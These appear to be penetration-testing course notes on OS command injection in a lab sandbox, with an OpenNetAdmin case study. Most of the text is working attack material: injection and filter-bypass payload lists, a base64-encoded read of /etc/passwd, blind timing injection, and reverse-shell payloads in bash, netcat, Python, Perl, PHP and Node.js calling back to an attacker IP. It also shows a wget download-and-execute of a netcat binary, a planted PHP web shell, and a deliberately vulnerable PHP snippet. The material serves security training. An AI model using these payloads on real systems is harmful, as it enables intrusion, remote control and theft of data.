Module 13: Command Injection
Discovery of Command Injection
Accessing the Command Injection Sandbox
Start the VPN, the VM, and add IP to hosts.
Familiarizing Ourselves with the Sandbox
First command injection payload
http://ci-sandbox:80/python/index.py?ip=127.0.0.1|id
Where is Command Injection Most Common?
Vulnerable Code Snippet
<?php
$IP = $_GET['IP'];
echo "<pre>";
system("ping -c 5 ".$IP);
echo "</pre>";
?>About the Chaining of Commands & System Calls
Executing a single command
kali@kali:~$ ls -ls
total 32
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Desktop
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Documents
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Downloads
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Music
4 drwxr-xr-x 2 kali kali 4096 Aug 23 07:12 Pictures
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Public
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Templates
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 VideosChaining our first commands
kali@kali:~$ ls -ls ; id
total 32
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Desktop
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Documents
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Downloads
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Music
4 drwxr-xr-x 2 kali kali 4096 Aug 23 07:12 Pictures
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Public
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Templates
4 drwxr-xr-x 2 kali kali 4096 May 31 03:34 Videos
uid=1000(kali) gid=1000(kali) groups=1000(kali),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),120(wireshark),134(scanner),142(kaboxer)Chaining with Logical AND (Success)
kali@kali:~$ whoami && hostname
kali
kaliChaining with Logical AND (Failure)
kali@kali:~$ foobar && hostname
foobar: command not foundChaining with Logical OR (Failure)
kali@kali:~$ whoami || id
kaliChaining with Logical OR (Success)
kali@kali:~$ foobar || whoami
foobar: command not found
kaliInline Execution Characters
`cmd`
$(cmd)Chaining with inline execution
kali@kali:~$ echo "This is an echo statement"
This is an echo statement
kali@kali:~$ echo "This is an `whoami` echo statement"
This is an kali echo statement
kali@kali:~$ echo "This is an $(whoami) echo statement"
This is an kali echo statementDealing with Common Protections
Typical Input Normalization - Sending Clean Payloads
Starting a Netcat Listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...Our Wrapped Payload with No URL Encoding
http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'
Our Encoded Payload result
bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.51/9090+0>%261'Our Wrapped Payload with URL Encoding (ready to be sent)
kali@kali:~$ curl "http://ci-sandbox/nodejs/index.js?ip=127.0.0.1|bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.51/9090+0>%261'"The above could have just been sent in Burp Suite's Repeater after URL-encoding the request...
Receiving a root privileged shell
...
listening on [any] 9090 ...
connect to [172.16.80.2] from (UNKNOWN) [172.16.80.1] 59993
bash: cannot set terminal process group (19): Inappropriate ioctl for device
bash: no job control in this shell
root@cdee2640ffbf:/#Typical Input Sanitization - Blocklisted Strings Bypass
A Null Statement Injection Bypass can be inserted between any characters of our choosing.
Null Statement Injection into our previous command injection
kali@kali:~$ wh$()oami
kali
A short wordlist to work with wfuzz
bogus
;id
|id
`id`
i$()d
;i$()d
|i$()d
FAIL||i$()d
&&id
&id
FAIL_INTENT|id
FAIL_INTENT||id
`sleep 5`
`sleep 10`
`id`
$(sleep 5)
$(sleep 10)
$(id)
;`echo 'aWQK' |base64 -d`
FAIL_INTENT|`echo 'aWQK' |base64 -d`
FAIL_INTENT||`echo 'aWQK' |base64 -d`Fuzzing with our Custom Wordlist
kali@kali:~$ wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
Total requests: 21
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 200 68 L 124 W 1156 Ch "|id"
000000015: 200 68 L 124 W 1156 Ch "`id`"
000000018: 200 68 L 124 W 1156 Ch "$(id)"
000000001: 200 68 L 117 W 1113 Ch "bogus"
000000012: 200 68 L 124 W 1156 Ch "FAIL_INTENT||id"
000000011: 200 68 L 124 W 1156 Ch "FAIL_INTENT|id"
000000008: 200 69 L 120 W 1167 Ch "FAIL||i$()d"
000000005: 200 68 L 117 W 1113 Ch "i$()d"
000000002: 200 68 L 124 W 1156 Ch ";id"
000000017: 200 68 L 124 W 1156 Ch "$(sleep 10)"
000000014: 200 68 L 124 W 1156 Ch "`sleep 10`"
000000004: 200 68 L 124 W 1156 Ch "`id`"
000000020: 200 69 L 120 W 1167 Ch "FAIL_INTENT|`echo 'aWQK' |base64 -d`"
000000021: 200 69 L 120 W 1167 Ch "FAIL_INTENT||`echo 'aWQK' |base64 -d`"
000000016: 200 68 L 124 W 1156 Ch "$(sleep 5)"
000000013: 200 68 L 124 W 1156 Ch "`sleep 5`"
000000007: 200 69 L 120 W 1167 Ch "|i$()d"
000000019: 200 79 L 187 W 1647 Ch ";`echo 'aWQK' |base64 -d`"
000000009: 200 78 L 184 W 1593 Ch "&&id"
000000006: 200 79 L 187 W 1647 Ch ";i$()d"
000000010: 200 78 L 184 W 1593 Ch "&id"
Total time: 0
Processed Requests: 21
Filtered Requests: 0
Requests/sec.: 0Fuzzing with our Custom Wordlist and a Suppressed Response-Size of 1156 bytes
kali@kali:~$ wfuzz -c -z file,/home/kali/command_injection_custom.txt --hc 404 --hh 1156 http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://ci-sandbox:80/php/blocklisted.php?ip=127.0.0.1FUZZ
Total requests: 21
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 68 L 117 W 1113 Ch "bogus"
000000005: 200 68 L 117 W 1113 Ch "i$()d"
000000008: 200 69 L 120 W 1167 Ch "FAIL||i$()d"
000000020: 200 69 L 120 W 1167 Ch "FAIL_INTENT|`echo 'aWQK' |base64 -d`"
000000021: 200 69 L 120 W 1167 Ch "FAIL_INTENT||`echo 'aWQK' |base64 -d`"
000000010: 200 78 L 184 W 1593 Ch "&id"
000000009: 200 78 L 184 W 1593 Ch "&&id"
000000007: 200 69 L 120 W 1167 Ch "|i$()d"
000000006: 200 79 L 187 W 1647 Ch ";i$()d"
000000019: 200 79 L 187 W 1647 Ch ";`echo 'aWQK' |base64 -d`"
Total time: 0
Processed Requests: 21
Filtered Requests: 11
Requests/sec.: 0
Encoding our payload with Base64
kali@kali:~$ echo "cat /etc/passwd" |base64
Y2F0IC9ldGMvcGFzc3dkCg==Our Full and Complete Payload
http://ci-sandbox/php/blocklisted.php?ip=127.0.0.1;`echo%20%22Y2F0IC9ldGMvcGFzc3dkCg==%22%20|base64%20-d`
Blind OS Command Injection Bypass
Attempting to execute the `id`command with blind command injection
http://ci-sandbox:80/php/blind.php?ip=127.0.0.1;id
Capturing the initial time
kali@kali:~$ time curl http://ci-sandbox:80/php/blind.php?ip=127.0.0.1
<html>
<head>
<link rel="stylesheet" href="../css/bootstrap.min.css">
<style type="text/css">
body{
background-color: #121212;
}
.check{
background-color: #1f1f1f;
border-radius: 4px;
padding-top: 34px;
width: 600px;
height: 150px;
align-self: center;
box-shadow: 5px 5px 5px #0f0f0f;
}
.online{
color: #00ff4c;
}
.offline{
color: #ff0000;
}
.noParam{
color: #FFFFFF;
}
</style>
</head>
<body>
<center>
<div class="check" align="center">
<pre>
<h3 class='offline'>[ - ] Host is DOWN </h3> </pre>
</div>
<img src="logo.png"/>
</center>
</body>
</html>
real 0m10.014sBypassing blind sanitization wtih sleep for execution verification
kali@kali:~$ time curl "http://ci-sandbox:80/php/blind.php?ip=127.0.0.1;sleep%2020"
<html>
<head>
<link rel="stylesheet" href="../css/bootstrap.min.css">
<style type="text/css">
body{
background-color: #121212;
}
.check{
background-color: #1f1f1f;
border-radius: 4px;
padding-top: 34px;
width: 600px;
height: 150px;
align-self: center;
box-shadow: 5px 5px 5px #0f0f0f;
}
.online{
color: #00ff4c;
}
.offline{
color: #ff0000;
}
.noParam{
color: #FFFFFF;
}
</style>
</head>
<body>
<center>
<div class="check" align="center">
<pre>
<h3 class='offline'>[ - ] Host is DOWN </h3> </pre>
</div>
<img src="logo.png"/>
</center>
</body>
</html>
real 0m30.002sExtra Mile
Do the lab.
Enumeration and Exploitation
Enumerating Command Injection Capabilities
Common Linux Capability Checks
Command
Used For
wget
File Transfer
curl
File Transfer
fetch
File Transfer
gcc
Compilation
cc
Compilation
nc
Shells, File Transfer, Port Forwarding
socat
Shells, File Transfer, Port Forwarding
ping
Networking, Code Execution Verification
netstat
Networking
ss
Networking
ifconfig
Networking
ip
Networking
hostname
Networking
php
Shells, Code Execution
python
Shells, Code Execution
python3
Shells, Code Execution
perl
Shells, Code Execution
java
Shells, Code Execution
Common Windows Capability Checks
Capability
Used For
Powershell
Code Execution, Enumeration, Movement, Payload Delivery
Visual Basic
Code Execution, Enumeration, Movement, Payload Delivery
tftp
File Transfer
ftp
File Transfer
certutil
File Transfer
Python
Code Execution, Enumeration
.NET
Code Execution, Privilege Escalation, Payload Delivery
ipconfig
Networking
netstat
Networking
hostname
Networking
systeminfo
System Information, Patches, Versioning, Arch, etc.
Custom Linux Capability Wordlist
w00tw00t
wget
curl
fetch
gcc
cc
nc
socat
ping
netstat
ss
ifconfig
ip
hostname
php
python
python3
perl
javaFuzzing and checking for capabilities with our Custom Wordlist
kali@kali:~$ wfuzz -c -z file,/home/kali/capability_checks_custom.txt --hc 404 "http://ci-sandbox:80/php/index.php?ip=127.0.0.1;which FUZZ"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://ci-sandbox:80/php/index.php?ip=127.0.0.1;which%20FUZZ
Total requests: 19
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000006: 200 11 L 69 W 503 Ch "cc"
000000015: 200 11 L 69 W 510 Ch "php"
000000018: 200 11 L 69 W 505 Ch "perl"
000000017: 200 11 L 69 W 508 Ch "python3"
000000001: 200 10 L 68 W 491 Ch "w00tw00t"
000000014: 200 11 L 69 W 506 Ch "hostname"
000000019: 200 10 L 68 W 491 Ch "java"
000000007: 200 11 L 69 W 499 Ch "nc"
000000016: 200 11 L 69 W 508 Ch "python"
000000003: 200 11 L 69 W 505 Ch "curl"
000000012: 200 11 L 69 W 506 Ch "ifconfig"
000000011: 200 10 L 68 W 491 Ch "ss"
000000010: 200 11 L 69 W 504 Ch "netstat"
000000013: 200 10 L 68 W 491 Ch "ip"
000000009: 200 11 L 69 W 502 Ch "ping"
000000004: 200 10 L 68 W 492 Ch "fetch"
000000005: 200 11 L 69 W 505 Ch "gcc"
000000008: 200 10 L 68 W 492 Ch "socat"
000000002: 200 11 L 69 W 506 Ch "wget"
Total time: 0
Processed Requests: 19
Filtered Requests: 0
Requests/sec.: 0Enumerated capabilities
cc
gcc
php
perl
python
python3
hostname
nc
netstat
curl
wget
ping
ifconfigObtaining a Shell - Netcat
Starting a Netcat listener
nc -nlvp 9090
Endpoin for our command injection
http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|/bin/nc%20-nv%20192.168.49.51%209090%20-e%20/bin/bashA root shell with netcat
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 51321
whoami
rootObtaining a Shell - Python
Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Unfolded Python Payload
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.49.51",9090))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);'Starting a Netcat Listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...Full endpoint with payload in the command injection sandbox
http://ci-sandbox/php/index.php?ip=127.0.0.1;python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.49.51%22,9090));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27Receiving the reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 51809
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$Obtaining a Shell - Node.js
Chained Node.js Reverse Shell
echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.jsThe Full Command Injection Endpoint
http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.jsThe full URL-encoded command injection endpoint
http://ci-sandbox:80/nodejs/index.js?ip=127.0.0.1|echo%20%22require(%27child_process%27).exec(%27nc%20-nv%20192.168.49.51%209090%20-e%20%2Fbin%2Fbash%27)%22%20%3E%20%2Fvar%2Ftmp%2Foffsec.js%20%3B%20node%20%2Fvar%2Ftmp%2Foffsec.jsStarting a Netcat listener on port 9090
kali@kali:!$ nc -nlvp 9090
listening on [any] 9090 ...Receiving our reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 52319
whoami
rootObtaining a Shell - PHP
PHP Reverse Shell Examples
php -r '$sock=fsockopen("192.168.49.51",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.49.51",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'The first half of our PHP Payloads
php -r '$sock=fsockopen("192.168.49.51",9090);Various PHP Execution Options
exec("/bin/sh -i <&3 >&3 2>&3");'
shell_exec("/bin/sh -i <&3 >&3 2>&3");'
system("/bin/sh -i <&3 >&3 2>&3");'
passthru("/bin/sh -i <&3 >&3 2>&3");'
popen("/bin/sh -i <&3 >&3 2>&3", "r");'
Starting a netcat listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...Not encoded endpoing (including our payload)
http://ci-sandbox/php/index.php?ip=127.0.0.1;php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");"Complete endpoint (including our payload)
http://ci-sandbox/php/index.php?ip=127.0.0.1;php%20-r%20%22system(%5C%22bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.49.51%2F9090%200%3E%261%27%5C%22)%3B%22Receiving the reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 53017
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@5bce60aa9510:/var/www/html/php$Obtaining a Shell - Perl
Perl Reverse Shell
perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Perl Reverse Shell Unfolded
use Socket;
$i="192.168.49.51";
$p=9090;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))) {
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
}Full URL Encoded Endpoint
http://ci-sandbox/nodejs/index.js?ip=127.0.0.1|perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.49.51%22%3B%24p%3D9090%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B%27Starting a netcat listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...Receiving the reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 53590
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
#File Transfer
Placing the nc binary in our Apache2 web root
kali@kali:~$ sudo cp /bin/nc /var/www/html/
[sudo] password for kali:
kali@kali:~$Starting the Apache2 Service
kali@kali:~$ sudo service apache2 startThe full payload (unencoded)
wget http://192.168.49.51:80/nc -O /var/tmp/nc ; chmod 755 /var/tmp/nc ; /var/tmp/nc -nv 192.168.49.51 9090 -e /bin/bashThe full payload (encoded)
wget%20http://192.168.49.51:80/nc%20-O%20/var/tmp/nc%20;%20chmod%20755%20/var/tmp/nc%20;%20/var/tmp/nc%20-nv%20192.168.49.51%209090%20-e%20/bin/bashStarting a netcat listener on port 9090
kali@kali:~$ nc -nlvp 9090
listening on [any] 9090 ...Receiving the reverse shell
...
listening on [any] 9090 ...
connect to [192.168.49.51] from (UNKNOWN) [172.16.80.1] 60052
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Extra Mile I
Transfer a different payload, permit the payload, and change the file permissions to execute it for a reverse shell.
Writing a Web Shell
Finding our present working directory
http://ci-sandbox:80/php/index.php?ip=127.0.0.1;pwd
Using echo to write out our own webshell
echo+"<pre><?php+passthru(\$_GET['cmd']);+?></pre>"+>+/var/www/html/webshell.phpWriting our own webshell
http://ci-sandbox:80/php/index.php?ip=127.0.0.1;echo+%22%3Cpre%3E%3C?php+passthru(\$_GET[%27cmd%27]);+?%3E%3C/pre%3E%22+%3E+/var/www/html/webshell.php
Extra Mile II
Case Study - OpenNetAdmin (ONA)
Accessing OpenNetAdmin
Start the VPN, VM, and add the IP to your hosts file.
Discovery and Assessment
Exploitation
Full POST Data Payload attempting command injection
xajax=window_submit&xajaxr=1632763728103&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E172.24.0.2;id&xajaxargs[]=ping
PreviousModule 12: Server-side Template Injection - Discovery and ExploitationNextModule 14: Server-side Request Forgery
Last updated